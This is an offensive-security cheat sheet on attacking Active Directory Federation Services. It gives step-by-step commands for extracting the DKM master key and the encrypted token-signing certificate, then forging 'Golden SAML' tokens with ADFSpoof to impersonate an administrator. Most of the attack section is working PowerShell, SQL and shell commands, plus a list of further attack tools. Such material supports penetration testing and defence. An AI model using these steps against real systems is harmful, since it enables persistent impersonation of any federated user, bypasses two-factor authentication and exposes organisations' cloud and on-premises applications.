Active Directory - Federation Services
Active Directory Federation Services (AD FS) is a software component developed by Microsoft that provides users with single sign-on (SSO) access to systems and applications located across organizational boundaries. It uses a claims-based access control authorization model to maintain application security and to provide seamless access to web-based applications that are hosted inside or outside the corporate network.
ADFS - DKM Master Key
- The DKM key is stored in the
thumbnailPhoto
attribute of the AD contact object.
$key=(Get-ADObject -filter 'ObjectClass -eq "Contact" -and name -ne "CryptoPolicy"' -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=domain,DC=local" -Properties thumbnailPhoto).thumbnailPhoto
[System.BitConverter]::ToString($key)
ADFS - Trust Relationship
Gets the relying party trusts of the Federation Service.
- Search for
IssuanceAuthorizationRules
ADFS - Golden SAML
Golden SAML is a type of attack where an attacker creates a forged SAML (Security Assertion Markup Language) authentication response to impersonate a legitimate user and gain unauthorized access to a service provider. This attack leverages the trust established between the identity provider (IdP) and service provider (SP) in a SAML-based single sign-on (SSO) system.
- Golden SAML are effective even when 2FA is enabled.
- The token-signing private key is not renewed automatically
- Changing a user’s password won't affect the generated SAML
Requirements:
- ADFS service account
- The private key (PFX with the decryption password)
Exploitation:
- Run mandiant/ADFSDump on ADFS server as the ADFS service account. It will query the Windows Internal Database (WID):
\\.\pipe\MICROSOFT##WID\tsql\query
-
Convert PFX and Private Key to binary format
-
Create the Golden SAML using mandiant/ADFSpoof, you might need to update the dependencies.
mkdir ADFSpoofTools cd $_ git clone https://github.com/dmb2168/cryptography.git git clone https://github.com/mandiant/ADFSpoof.git virtualenv3 venvADFSSpoof source venvADFSSpoof/bin/activate pip install lxml pip install signxml pip uninstall -y cryptography cd cryptography pip install -e . cd ../ADFSpoof pip install -r requirements.txt python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
Manual Exploitation:
- Retrieve the WID path:
Get-AdfsProperties
- Retrieve the ADFS Relying Party Trusts:
Get-AdfsRelyingPartyTrust
- Retrieve the signing certificate, save the
EncryptedPfx
and decode itbase64 -d adfs.b64 > adfs.bin
$cmd.CommandText = "SELECT ServiceSettingsData from AdfsConfigurationV3.IdentityServerPolicy.ServiceSettings" $client= New-Object System.Data.SQLClient.SQLConnection($ConnectionString); $client.Open(); $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT name FROM sys.databases" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $name = $reader.GetString(0) $reader.Close() Write-Output $name;
- Retrieve the DKM key stored inside the
thumbnailPhoto
attribute of the Active Directory: - Convert the retrieved key to raw format:
echo "RETRIEVED_KEY_HERE" | base64 -d > adfs.key
- Use mandiant/ADFSpoof to generate the Golden SAML
NOTE: There might be multiple master keys in the container, remember to try them all.
Golden SAML Examples
-
SAML2: requires
--endpoint
,--nameidformat
,--identifier
,--nameid
and--assertions
python ADFSpoof.py -b adfs.bin adfs.key -s adfs.domain.local saml2 --endpoint https://www.contoso.com/adfs/ls /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
-
Office365: requires
--upn
and--objectguid
-
Other: connect to the service provider using a known account, analyze the SAML token attributes given and reuse their format.
NOTE: Sync the time between the attacker's machine generating the Golden SAML and the ADFS server.
Other interesting tools to exploit AD FS:
- secureworks/whiskeysamlandfriends/WhiskeySAML - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction.
- cyberark/shimit - A tool that implements the Golden SAML attack
References
- I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant
- Active Directory Federation Services (ADFS) Distributed Key Manager (DKM) Keys - Threat Hunter Playbook
- Exploring the Golden SAML Attack Against ADFS - 7 December 2021
- Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps - Shaked Reiner - 11/21/17
- Meet Silver SAML: Golden SAML in the Cloud - Tomer Nahum and Eric Woodruff - Feb 29, 2024